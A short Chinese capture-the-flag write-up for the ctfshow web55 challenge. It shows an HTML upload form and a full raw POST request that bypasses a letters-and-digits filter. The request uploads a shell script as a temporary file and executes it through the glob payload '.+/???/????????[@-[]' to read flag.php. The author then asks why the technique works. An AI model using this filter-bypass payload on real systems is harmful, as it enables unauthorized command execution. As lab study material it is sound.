ctfshow Web55 只用符号的命令执行

过滤所有字母数字的命令执行

题目：ctfshow web55

生成Post请求的网页源码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Post文件</title>
</head>
<body>
<form action="http://85eb92dd-324f-4c12-903e-22077c4c6f71.challenge.ctf.show/" method="post" enctype="multipart/form-data">

    <label for="file">文件名：</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

最终payload：

POST /?c=.+/???/????????[@-[] HTTP/1.1
Host: 85eb92dd-324f-4c12-903e-22077c4c6f71.challenge.ctf.show
Content-Length: 301
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNoPBaLZ9PrbRojyI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryNoPBaLZ9PrbRojyI
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain

#!/bin/sh
cat flag.php
------WebKitFormBoundaryNoPBaLZ9PrbRojyI
Content-Disposition: form-data; name="submit"

鎻愪氦
------WebKitFormBoundaryNoPBaLZ9PrbRojyI--

疑问

为什么get方法接收的参数，我们却用post方法提交也可以达到相同结果。
是不是由于上传的临时文件会在操作后被删除，因此才把post请求带上参数，在传文件的同时执行代码呢？